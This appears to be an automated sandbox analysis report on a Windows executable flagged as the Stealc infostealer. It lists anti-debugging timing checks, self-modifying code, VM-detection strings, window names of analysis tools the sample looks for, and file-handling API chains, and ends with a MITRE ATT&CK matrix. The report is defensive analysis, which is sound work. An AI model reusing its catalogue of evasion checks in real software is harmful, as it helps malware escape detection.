                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828D0A second address: 828D10 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82C4E3 second address: 82C4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833CF9 second address: 833D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF7Dh 0x00000009 popad 0x0000000a jbe 00007F5ED52EEF8Eh 0x00000010 pushad 0x00000011 jns 00007F5ED52EEF76h 0x00000017 ja 00007F5ED52EEF76h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834866 second address: 83487C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF480h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83487C second address: 834882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834882 second address: 834886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C4F8 second address: 83C4FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84961F second address: 849633 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF480h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8497FB second address: 849805 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5ED52EEF76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84D13B second address: 84D145 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8543EB second address: 85442D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF83h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5ED52EEF83h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5ED52EEF83h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8592BB second address: 859301 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5ED4EAF476h 0x00000008 jmp 00007F5ED4EAF47Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F5ED4EAF487h 0x00000014 push edi 0x00000015 push edi 0x00000016 pop edi 0x00000017 jmp 00007F5ED4EAF47Fh 0x0000001c pop edi 0x0000001d popad 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 859301 second address: 859314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF7Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 859314 second address: 859321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85DBAF second address: 85DBC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862FB9 second address: 862FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862FBD second address: 862FC9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5ED52EEF76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862FC9 second address: 862FDE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F5ED4EAF480h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868731 second address: 86874E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F5ED52EEF80h 0x00000008 js 00007F5ED52EEF76h 0x0000000e pop ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8688C0 second address: 8688C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8688C9 second address: 8688CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8688CF second address: 8688DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF47Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868A3E second address: 868A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868BAF second address: 868BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868BB5 second address: 868BD1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5ED52EEF84h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868D55 second address: 868D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jns 00007F5ED4EAF476h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868D67 second address: 868D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868D6D second address: 868D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F5ED4EAF478h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868D7A second address: 868D7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8691B1 second address: 8691CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF483h 0x00000007 jo 00007F5ED4EAF47Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FE47 second address: 86FE50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FE50 second address: 86FE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F5ED4EAF482h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FE69 second address: 86FE6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FE6F second address: 86FE79 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5ED4EAF476h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FE79 second address: 86FE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jne 00007F5ED52EEF76h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C992 second address: 87C99F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F5ED4EAF476h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C99F second address: 87C9A9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5ED52EEF7Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7886CE second address: 7886D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E231 second address: 87E235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E235 second address: 87E24B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jo 00007F5ED4EAF476h 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88B1EF second address: 88B203 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF7Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89D64F second address: 89D655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89D655 second address: 89D66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F5ED52EEF7Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89D92B second address: 89D931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89D931 second address: 89D93F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F5ED52EEF76h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89DF32 second address: 89DF37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89DF37 second address: 89DF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF81h 0x00000009 jne 00007F5ED52EEF76h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F5ED52EEF7Ah 0x00000019 pushad 0x0000001a popad 0x0000001b push edi 0x0000001c pop edi 0x0000001d popad 0x0000001e pushad 0x0000001f jo 00007F5ED52EEF76h 0x00000025 push edx 0x00000026 pop edx 0x00000027 jmp 00007F5ED52EEF7Fh 0x0000002c popad 0x0000002d push edi 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89E0E3 second address: 89E0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89E0E9 second address: 89E0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89E270 second address: 89E276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89E276 second address: 89E27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89E27A second address: 89E284 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5ED4EAF476h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89FE36 second address: 89FE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF7Eh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A13CC second address: 8A13D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A3F78 second address: 8A3F96 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5ED52EEF76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F5ED52EEF78h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A4185 second address: 8A419D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF484h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0249 second address: 4EF024F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 611B71 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7B914C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 83E6B6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003C38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003C4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_003BDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_003BE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_003BED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_003C4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003BDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_003BBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003BF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_003C3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003B16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B1160 GetSystemInfo,ExitProcess,0_2_003B1160
                Source: file.exe, file.exe, 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2239077197.00000000011E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware]&/
                Source: file.exe, 00000000.00000002.2239077197.00000000011B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                Source: file.exe, 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13578
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13581
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13599
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13633
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13593
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B45C0 VirtualProtect ?,00000004,00000100,000000000_2_003B45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003C9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C9750 mov eax, dword ptr fs:[00000030h]0_2_003C9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003C7850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5476, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_003C9600
                Source: file.exe, 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: MProgram Manager
                Source: file.exeBinary or memory string: MProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_003C7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_003C6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003C7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_003C7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.3b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2197795166.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5476, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.3b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2197795166.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5476, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
